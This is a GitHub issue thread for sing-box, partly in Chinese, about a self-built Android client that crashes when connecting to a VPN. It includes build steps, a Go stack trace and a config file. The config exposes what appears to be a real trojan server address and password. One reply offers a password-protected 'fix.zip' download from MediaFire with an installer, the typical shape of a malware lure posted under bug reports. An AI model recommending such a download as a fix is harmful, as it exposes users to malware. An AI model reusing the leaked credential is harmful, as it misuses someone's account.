### ISSUE TITLE
Android 连接Vpn时Crash

### ISSUE THREAD

**Issue by devchuan** [SagerNet/sing-box#2066]
### Operating system

Android

### System version

Android 14

### Installation type

sing-box for Android Graphical Client

### If you are using a graphical client, please provide the version of the client.

三星

### Version

```shell
1.9.4
```

### Description

当app连接上vpn的时候瞬间crash崩溃。使用相同配置文件在google play下载的sing-box app不会崩溃

### Reproduction

1.  git clone -b v1.9.4 --single-branch https://github.com/SagerNet/sing-box.git
2. 执行make install 成功
3. 执行 make lib_android 成功
4. git clone  https://github.com/SagerNet/sing-box-for-android.git 并将git提交切到440aaa9a 将sing-box目录下生成的libbox.aar 放到app下libs目录内 
5. 运行安卓项目 成功运行，创建配置文件 将如下配置拷贝进去 格式化成功 校验成功。 连接后瞬间Crash

Java版本 java 17.0.2
ndk版本 23.0.7599858
go版本 go1.23.0 darwin/arm64
电脑系统版本MacOS 14.6.1 

配置文件
{
  "inbounds": [
    {
      "type": "tun",
      "inet4_address": "172.19.0.1/30",
      "auto_route": true,
      "strict_route": false
    }
  ],
  "outbounds": [
    {
      "tag": "trojan-out",
      "type": "trojan",
      "server": "au-2.australiastudio.com",
      "server_port": 443,
      "password": "sK587MqzQzvUN9qxs5Jt",
      "network": "tcp",
      "tls": {
        "enabled": true,
        "server_name": "au-2.australiastudio.com"
      }
    }
  ],
  "route": {

  }
}

### Logs

```shell
崩溃日志

runtime: newstack at runtime.printlock+0x78 sp=0x40002637d0 stack=[0x4000260000, 0x4000264000]
	morebuf={pc:0x7239ed1a10 sp:0x40002637d0 lr:0x0}
	sched={pc:0x7239f07368 sp:0x40002637d0 lr:0x7239ed1a10 ctxt:0x0}
runtime.callbackUpdateSystemStack(0x4000100708, 0x71df591290, 0x0)
	runtime/cgocall.go:257 +0x90 fp=0x4000263830 sp=0x40002637d0 pc=0x7239ed1a10
runtime.cgocallbackg(0x723a8bffc0, 0x71df591380, 0x0)
	runtime/cgocall.go:322 +0x68 fp=0x4000263880 sp=0x4000263830 pc=0x7239ed1bd8
runtime.cgocallbackg(0x723a8bffc0, 0x71df591380, 0x0)
	<autogenerated>:1 +0x1c fp=0x40002638b0 sp=0x4000263880 pc=0x7239f4a5fc
runtime.cgocallback(0x4000263928, 0x723a8aadc4, 0x723a8c954c)
	runtime/asm_arm64.s:1131 +0xb0 fp=0x40002638e0 sp=0x40002638b0 pc=0x7239f488c0
runtime.systemstack_switch()
	runtime/asm_arm64.s:201 +0x8 fp=0x40002638f0 sp=0x40002638e0 pc=0x7239f46488
runtime.cgocall(0x723a8c954c, 0x4000263968)
	runtime/cgocall.go:185 +0x70 fp=0x4000263930 sp=0x40002638f0 pc=0x7239f39790
main._Cfunc_cproxylibbox_PlatformInterface_StartDefaultInterfaceMonitor(0x2c, 0xffffffe6)
	_cgo_gotypes.go:975 +0x34 fp=0x4000263960 sp=0x4000263930 pc=0x723a8aadc4
main.(*proxylibbox_PlatformInterface).StartDefaultInterfaceMonitor(0x40002e9c4c, {0x723ab78e48?, 0x4000170180?})
	github.com/sagernet/sing-box/build/arm64/libbox/go_libboxmain.go:2730 +0x88 fp=0x40002639b0 sp=0x4000263960 pc=0x723a8b6d48
github.com/sagernet/sing-box/experimental/libbox.(*platformDefaultInterfaceMonitor).Start(0x723b315290?)
	github.com/sagernet/sing-box/experimental/libbox/monitor.go:39 +0x3c fp=0x40002639e0 sp=0x40002639b0 pc=0x723a89e4ec
github.com/sagernet/sing-box/route.(*Router).PreStart(0x4000190008)
	github.com/sagernet/sing-box/route/router.go:448 +0x188 fp=0x4000263a60 sp=0x40002639e0 pc=0x723a8374e8
github.com/sagernet/sing-box.(*Box).preStart(0x400016db80)
	github.com/sagernet/sing-box/box.go:265 +0x5e4 fp=0x4000263be0 sp=0x4000263a60 pc=0x723a8869c4
github.com/sagernet/sing-box.(*Box).start(0x400016db80)
	github.com/sagernet/sing-box/box.go:277 +0x28 fp=0x4000263d80 sp=0x4000263be0 pc=0x723a886fc8
github.com/sagernet/sing-box.(*Box).Start(0x400016db80)
	github.com/sagernet/sing-box/box.go:219 +0x30 fp=0x4000263e10 sp=0x4000263d80 pc=0x723a886140
github.com/sagernet/sing-box/experimental/libbox.(*BoxService).Start(...)
	github.com/sagernet/sing-box/experimental/libbox/service.go:74
main.proxylibbox_BoxService_Start(0xffffff01?)
	github.com/sagernet/sing-box/build/arm64/libbox/go_libboxmain.go:117 +0x3c fp=0x4000263e40 sp=0x4000263e10 pc=0x723a8ac37c
_cgoexp_b496ff3a8868_proxylibbox_BoxService_Start(0x71df5933d8)
	_cgo_gotypes.go:1571 +0x28 fp=0x4000263e60 sp=0x4000263e40 pc=0x723a8bbe08
runtime.cgocallbackg1(0x723a8bbde0, 0x71df5933d8, 0x0)
	runtime/cgocall.go:437 +0x21c fp=0x4000263f30 sp=0x4000263e60 pc=0x7239ed1f0c
runtime.cgocallbackg(0x723a8bbde0, 0x71df5933d8, 0x0)
	runtime/cgocall.go:356 +0xf4 fp=0x4000263f80 sp=0x4000263f30 pc=0x7239ed1c64
runtime.cgocallbackg(0x723a8bbde0, 0x71df5933d8, 0x0)
	<autogenerated>:1 +0x1c fp=0x4000263fb0 sp=0x4000263f80 pc=0x7239f4a5fc
runtime.cgocallback(0x0, 0x0, 0x0)
	runtime/asm_arm64.s:1131 +0xb0 fp=0x4000263fe0 sp=0x4000263fb0 pc=0x7239f488c0
runtime.goexit({})
	runtime/asm_arm64.s:1223 +0x4 fp=0x4000263fe0 sp=0x4000263fe0 pc=0x7239f489b4
fatal error: runtime: stack split at bad time
```

### Supporter

- [ ] I am a [sponsor](https://github.com/sponsors/nekohasekai/)

### Integrity requirements

- [X] I confirm that I have read the documentation, understand the meaning of all the configuration items I wrote, and did not pile up seemingly useful options or default values.
- [X] I confirm that I have provided the server and client configuration files and process that can be reproduced locally, instead of a complicated client configuration file that has been stripped of sensitive data.
- [X] I confirm that I have provided the simplest configuration that can be used to reproduce the error I reported, instead of depending on remote servers, TUN, graphical interface clients, or other closed-source software.
- [X] I confirm that I have provided the complete configuration files and logs, rather than just providing parts I think are useful out of confidence in my own intelligence.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cristlee** [comment]
same issue, would like to donate or pay for anyone who save the problem
